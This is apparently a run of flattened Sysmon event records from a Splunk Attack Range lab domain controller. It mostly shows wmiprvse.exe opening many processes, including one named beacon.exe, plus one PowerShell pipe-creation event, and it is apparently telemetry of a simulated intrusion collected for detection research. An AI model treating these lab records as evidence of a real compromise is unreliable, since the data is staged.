Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239169Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.935{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB20-603C-5D79-00000000AD01}1652C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239168Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.935{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239167Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.935{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7A5F-6039-4410-00000000AD01}2140C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239166Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.935{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7949-6039-1B10-00000000AD01}5344C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239165Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.920{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7948-6039-1A10-00000000AD01}4808C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239164Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.920{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1910-00000000AD01}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239163Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.920{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1810-00000000AD01}4892C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239162Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.920{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239161Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.920{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B70F-00000000AD01}5892C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239160Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.920{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B60F-00000000AD01}5836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239159Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.920{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74FB-6039-800F-00000000AD01}6628C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 17141700x80000000000000002239158Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:53:44.920{05ADC7E1-6D98-603E-A1AA-00000000AD01}9808\PSHost.132591776247849193.9808.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x80000000000000002239157Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.920{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-780F-00000000AD01}6760C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239156Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.920{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-770F-00000000AD01}7048C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239155Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.920{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-72C7-6039-2E0F-00000000AD01}4048C:\Users\Administrator\Desktop\beacon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239154Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.920{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CBF-6039-3A0E-00000000AD01}4736C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239153Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.920{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-32CA-6039-2C07-00000000AD01}1356C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239152Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.920{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CD05-00000000AD01}656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239151Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.920{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CA05-00000000AD01}4956C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239150Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.920{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C405-00000000AD01}5096C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239149Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 